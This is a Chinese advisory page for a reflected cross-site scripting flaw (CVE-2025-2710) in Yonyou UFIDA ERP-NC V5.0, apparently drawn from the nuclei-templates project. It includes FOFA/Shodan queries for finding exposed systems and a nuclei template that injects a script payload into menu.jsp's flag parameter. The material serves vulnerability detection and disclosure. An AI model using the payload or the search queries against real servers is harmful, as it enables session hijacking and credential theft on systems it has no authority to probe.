Yonyou UFIDA ERP-NC V50 跨站脚本漏洞

漏洞信息

漏洞名称: Yonyou UFIDA ERP-NC V5.0 跨站脚本漏洞

漏洞编号:

  • CVE: CVE-2025-2710

漏洞类型: 跨站可执行脚本

漏洞等级: 中危

漏洞描述: Yonyou UFIDA ERP-NC V5.0是一款广泛使用的企业资源规划(ERP)系统,旨在帮助企业管理和整合其业务流程。该系统在中国及其他地区的企业中有着广泛的应用,尤其是在财务管理、供应链管理和人力资源管理等方面。该漏洞存在于系统的menu.jsp页面中,由于对flag参数的用户输入未进行适当的清理和验证,导致反射型跨站脚本(XSS)漏洞。攻击者可以通过构造恶意的URL,诱使受害者点击,从而在受害者的浏览器中执行任意JavaScript代码。这种漏洞的利用可能导致会话劫持、凭证盗窃或在ERP系统中进行其他恶意活动。由于该漏洞不需要用户认证即可利用,且可以通过自动化工具进行大规模扫描和攻击,因此对使用该版本ERP系统的企业构成了中等级别的安全威胁。

产品厂商: yonyou

产品名称: ufida_erp-nc

影响版本: 5.0

搜索语法: icon_hash=”1085941792” || title:”用友”

来源: https://github.com/projectdiscovery/nuclei-templates/blob/36d56c38377a985be8a9f7f762cc8d17eef5ebb6/http%2Fcves%2F2025%2FCVE-2025-2710.yaml

类型: projectdiscovery/nuclei-templates:github issues

POC详情

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58

id: CVE-2025-2710

info:
  name: Yonyou UFIDA ERP-NC V5.0 - Cross-Site Scripting
  author: ritikchaddha
  severity: medium
  description: |
    Yonyou UFIDA ERP-NC V5.0 is vulnerable to reflected cross-site scripting (XSS) via the flag parameter in menu.jsp. Unsanitized user input is reflected in the response, allowing arbitrary JavaScript execution.
  impact: |
    Successful exploitation of this XSS vulnerability allows attackers to execute arbitrary JavaScript code in victims' browsers, potentially leading to session hijacking, credential theft, or other malicious activities in the ERP system.
  remediation: |
    Update Yonyou UFIDA ERP-NC to the latest version. Implement proper input validation and output encoding for all user-supplied data, especially the flag parameter in menu.jsp.
  reference:
    - https://github.com/Hebing123/cve/issues/85
    - https://nvd.nist.gov/vuln/detail/CVE-2025-2710
  classification:
    cve-id: CVE-2025-2710
    cwe-id: CWE-79
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cpe: cpe:2.3:a:yonyou:ufida_erp-nc:5.0:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: yonyou
    product: ufida_erp-nc
    fofa-query: icon_hash="1085941792"
    shodan-query: title:"用友"
  tags: cve,cve2025,xss,erp-nc,ufida,yonyou

flow: http(1) && http(2)

http:
  - method: GET
    path:
      - "{{BaseURL}}/index.jsp"

    host-redirects: true
    matchers:
      - type: dsl
        dsl:
          - 'contains_any(tolower(body), "yonyou nc", "name=\"ncapplet")'
        internal: true

  - method: GET
    path:
      - "{{BaseURL}}/menu.jsp?flag=%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E"

    matchers:
      - type: dsl
        dsl:
          - 'contains(body, "<script>alert(document.domain)</script>")'
          - 'contains(content_type, "text/html")'
          - 'status_code == 200'
        condition: and